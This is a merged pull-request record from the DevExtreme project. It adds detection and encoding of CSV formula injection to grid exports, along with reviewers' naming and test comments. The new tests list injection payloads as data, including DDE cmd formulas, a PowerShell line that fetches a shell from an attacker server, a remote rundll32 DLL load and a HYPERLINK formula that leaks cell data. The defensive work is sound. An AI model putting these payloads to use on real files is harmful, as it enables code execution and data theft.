### PR TITLE
DataGrid, PivotGrid CSV export: add capability to prevent executable content (T1135295)

### PR DESCRIPTION
**Pull request by EugeniyKiyashko**
### Cherry-Picks
- #23660
- #23663

### CODE REVIEW

File: js/exporter/exceljs/export_format.js [hunk 1]
```diff
@@ -117,6 +117,39 @@ function _convertNumberFormat(format, precision, currency) {
     return result;
 }
 
+function _hasCSVInjection(value) {
```
Comment (ksercs) [inline js/exporter/exceljs/export_format.js:120]: prefix underscore looks really strange for me)

File: js/exporter/exceljs/export_format.js [hunk 2]
```diff
@@ -117,6 +117,39 @@ function _convertNumberFormat(format, precision, currency) {
...
+    if(!value || value.length < 2) { return false; }
+
+    return _hasCSVExpression(value);
```
Comment (ksercs) [inline js/exporter/exceljs/export_format.js]:
```suggestion
    return _includesCsvExpression(value);
```

File: js/exporter/exceljs/export_format.js [hunk 3]
```diff
@@ -117,6 +117,39 @@ function _convertNumberFormat(format, precision, currency) {
...
+function _hasCSVQuotedInjection(value, textQualifier) {
+    if(!value || value.length < 4 || value[0] !== textQualifier) {
+        return false;
+    }
+
+    return _hasCSVExpression(value.substring(1, value.length - 1));
+}
+
+function _hasCSVExpression(value) {
+    const possibleInjection = /^[@=\t\r]/;
```
Comment (ksercs) [inline js/exporter/exceljs/export_format.js]:
```suggestion
    const injectionPrefix = /^[@=\t\r]/;
```

File: js/exporter/exceljs/export_format.js [hunk 4]
```diff
@@ -117,6 +117,39 @@ function _convertNumberFormat(format, precision, currency) {
...
+    const possibleInjectionSigns = /^[+-]/;
```
Comment (ksercs) [inline js/exporter/exceljs/export_format.js]:
```suggestion
    const possibleInjectionPrefix = /^[+-]/;
```

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js [hunk 5]
```diff
@@ -6522,3 +6522,134 @@ LoadPanelTests.runTests(moduleConfig, exportDataGrid, (options) => $('#dataGrid'
         dataSource: [{ f1: 'f1_1' }],
         loadingTimeout: null
     }, 'worksheet');
+
+QUnit.module('Encode', moduleConfig, () => {
+    QUnit.test('Encode test', function(assert) {
+        const done = assert.async();
+
+        const ds = [
```
Comment (ksercs) [inline testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]:
```suggestion
        const dataSource = [
```

File: js/exporter/exceljs/export_format.js (hunk 1 above)
Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js:120]: It is common styling for internal function in this file. It needs to refactor all functions and remove `_` for them. Such changes should be introduce in another PR.

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js [hunk 6]
```diff
@@ -6522,3 +6522,134 @@ LoadPanelTests.runTests(moduleConfig, exportDataGrid, (options) => $('#dataGrid'
         dataSource: [{ f1: 'f1_1' }],
         loadingTimeout: null
     }, 'worksheet');
+
+QUnit.module('Encode', moduleConfig, () => {
+    QUnit.test('Encode test', function(assert) {
```
Comment (ksercs) [inline testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]:
```suggestion
    QUnit.test('All executable cell content should be encoded if encodeExecutableContent = true', function(assert) {
```

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js [hunk 7]
```diff
@@ -6522,3 +6522,134 @@ LoadPanelTests.runTests(moduleConfig, exportDataGrid, (options) => $('#dataGrid'
         dataSource: [{ f1: 'f1_1' }],
         loadingTimeout: null
     }, 'worksheet');
+
+QUnit.module('Encode', moduleConfig, () => {
```
Comment (ksercs) [inline testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]:
```suggestion
QUnit.module('encodeExecutableContent option', moduleConfig, () => {
```

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js [hunk 8]
```diff
@@ -6522,3 +6522,134 @@ LoadPanelTests.runTests(moduleConfig, exportDataGrid, (options) => $('#dataGrid'
...
+
+        const dataGrid = $('#dataGrid').dxDataGrid({
+            columns: [{ dataField: 'value' }],
+            dataSource: ds,
+            showColumnHeaders: false,
+            loadingTimeout: null
+        }).dxDataGrid('instance');
+
+        const expectedCells = [
+            [{ excelCell: { value: '"\'=test"', dataType: 'string', type: ExcelJS.ValueType.String, numFmt: '@' }, gridCell: { } }],
```
Comment (ksercs) [inline testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: cannot we reduce copypaste some way? for example, move dataType and type to constants

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js [hunk 9]
```diff
@@ -6522,3 +6522,134 @@ LoadPanelTests.runTests(moduleConfig, exportDataGrid, (options) => $('#dataGrid'
...
+            { value: '\ttab' },
+            { value: '\rCarriage return' },
+            { value: '\r=2+3' },
+            { value: '=DDE ("cmd";"/C calc";"!A0")A0' },
+            { value: '@SUM(1+9)*cmd|\' /C calc\'!A0' },
+            { value: '=10+20+cmd|\' /C calc\'!A0\'' },
+            { value: '=cmd|\' /C notepad\'!\'A1\'' },
+            { value: '=cmd|\'/C powershell IEX(wget attacker_server/shell.exe)\'!A0\'' },
+            { value: '=cmd|\'/c rundll32.exe \\10.0.0.1\\3\\2\\1.dll,0\'!_xlbgnm.A1' },
+            { value: '=HYPERLINK("http://example.com?leak="&A1&A2,"Error: please click for further information")' },
```
Comment (ksercs) [inline testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: Is there a way to place input and output data nearby? It's hard to understand what expected value are related to an input row.

Comment (EugeniyKiyashko) [reply testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js (hunk 8 above)
Comment (EugeniyKiyashko) [reply testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js (hunk 7 above)
Comment (EugeniyKiyashko) [reply testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js (hunk 6 above)
Comment (EugeniyKiyashko) [reply testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js (hunk 5 above)
Comment (EugeniyKiyashko) [reply testing/tests/DevExpress.exporter/exceljsParts/exceljs.dataGrid.tests.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: js/exporter/exceljs/export_format.js (hunk 4 above)
Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: js/exporter/exceljs/export_format.js (hunk 3 above)
Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: js/exporter/exceljs/export_format.js (hunk 2 above)
Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/6c3805d37d2d80606e758f5fd3323b024f0efa98

File: js/exporter/exceljs/export_format.js [hunk 10]
```diff
@@ -117,6 +117,39 @@ function _convertNumberFormat(format, precision, currency) {
...
+    if(!value || value.length < 4 || value[0] !== textQualifier) {
+        return false;
+    }
+
+    return _includesCSVExpression(value.substring(1, value.length - 1));
+}
+
+function _includesCSVExpression(value) {
+    const injectionPrefix = /^[@=\t\r]/;
+    const injectionPrefixSigns = /^[+-]/;
```
Comment (ksercs) [inline js/exporter/exceljs/export_format.js]: As far as i remember i suggested another naming :)

Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js]: Yes. It is not a typo. I suggest this name more suitable in this case.

Comment (EugeniyKiyashko) [reply js/exporter/exceljs/export_format.js]: https://github.com/DevExpress/DevExtreme/pull/23600/commits/2a70f9550a42b1a980f8794c25e20c390520b090

**Review by ksercs — APPROVED** [review]

**Review by andrewmakarov — APPROVED** [review]

**Review by andrewmakarov — APPROVED** [review]

**Review by ksercs — APPROVED** [review]

**Review by vladaskorohodova — APPROVED** [review]

**Review by IlyaKhD — APPROVED** [review]

**Pull request merged**